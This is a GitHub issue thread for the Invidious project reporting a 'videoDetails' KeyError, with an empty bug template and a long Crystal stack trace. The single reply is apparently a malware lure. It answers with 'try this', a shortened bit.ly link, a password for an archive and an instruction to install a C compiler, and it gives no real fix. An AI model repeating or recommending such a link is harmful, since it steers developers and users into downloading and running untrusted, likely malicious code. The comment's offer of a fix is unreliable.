### ISSUE TITLE
[Bug] Missing hash key: "videoDetails" (KeyError)

### ISSUE THREAD

**Issue by Yoobyul** [iv-org/invidious#4959]
**Describe the bug**

**Steps to Reproduce**

**Logs**

**Screenshots**

**Additional context**

Missing hash key: "videoDetails" (KeyError)
  from /usr/lib/crystal/lib/hash.cr:1148:11 in '[]'
  from /usr/lib/crystal/lib/hash.cr:1199:17 in 'dig'
  from src/invidious/videos/parser.cr:185:12 in 'try_fetch_streaming_data'
  from src/invidious/videos/parser.cr:113:5 in 'extract_video_info'
  from src/invidious/videos.cr:327:3 in 'fetch_video'
  from src/invidious/videos.cr:315:13 in 'get_video'
  from src/invidious/videos.cr:297:1 in 'get_video:region'
  from src/invidious/routes/watch.cr:55:15 in 'handle'
  from src/invidious/routing.cr:159:19 in '->'
  from lib/kemal/src/kemal/route.cr:12:26 in '->'
  from src/invidious/helpers/handlers.cr:30:5 in 'process_request'
  from lib/kemal/src/kemal/route_handler.cr:17:7 in 'call'
  from /usr/lib/crystal/lib/http/server/handler.cr:30:7 in 'call_next'
  from lib/kemal/src/kemal/websocket_handler.cr:13:14 in 'call'
  from /usr/lib/crystal/lib/http/server/handler.cr:30:7 in 'call_next'
  from lib/kemal/src/kemal/filter_handler.cr:21:7 in 'call'
  from /usr/lib/crystal/lib/http/server/handler.cr:30:7 in 'call_next'
  from src/invidious/helpers/handlers.cr:157:5 in 'call'
  from /usr/lib/crystal/lib/http/server/handler.cr:30:7 in 'call_next'
  from src/invidious/helpers/handlers.cr:94:12 in 'call'
  from /usr/lib/crystal/lib/http/server/handler.cr:30:7 in 'call_next'
  from src/invidious/helpers/handlers.cr:146:5 in 'call'
  from /usr/lib/crystal/lib/http/server/handler.cr:30:7 in 'call_next'
  from src/invidious/helpers/handlers.cr:70:5 in 'call'
  from /usr/lib/crystal/lib/http/server/handler.cr:30:7 in 'call_next'
  from src/ext/kemal_static_file_handler.cr:162:16 in 'call'
  from /usr/lib/crystal/lib/http/server/handler.cr:30:7 in 'call_next'
  from lib/kemal/src/kemal/exception_handler.cr:8:7 in 'call'
  from /usr/lib/crystal/lib/http/server/handler.cr:30:7 in 'call_next'
  from src/invidious/helpers/logger.cr:17:35 in 'call'
  from /usr/lib/crystal/lib/http/server/handler.cr:30:7 in 'call_next'
  from lib/kemal/src/kemal/init_handler.cr:12:7 in 'call'
  from /usr/lib/crystal/lib/http/server/request_processor.cr:51:11 in 'process'
  from /usr/lib/crystal/lib/http/server.cr:521:5 in 'handle_client'
  from /usr/lib/crystal/lib/http/server.cr:451:5 in '->'
  from /usr/lib/crystal/lib/fiber.cr:141:11 in 'run'
  from /usr/lib/crystal/lib/fiber.cr:93:34 in '->'
  from ???
```
</p>
</details>

**Comment by SagarChandra07** [comment]
try this
https://bit.ly/47P0Nvo
Archive codepass: changeme
If you don't have the c compliator, install it.(gcc or clang)
